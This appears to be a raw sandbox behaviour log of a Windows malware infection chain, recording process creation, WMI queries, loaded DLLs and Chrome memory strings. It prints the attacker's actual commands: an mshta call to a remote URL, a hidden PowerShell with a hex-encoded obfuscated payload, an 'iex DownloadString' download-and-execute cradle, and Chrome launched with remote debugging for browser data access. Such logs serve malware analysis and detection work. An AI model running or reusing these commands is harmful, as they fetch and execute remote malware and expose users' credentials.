Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;e)
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290233202.0000781C02ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';0\
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';\'x
Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: chrome.exe, 00000009.00000002.57289934914.0000781C02A74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: imgutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
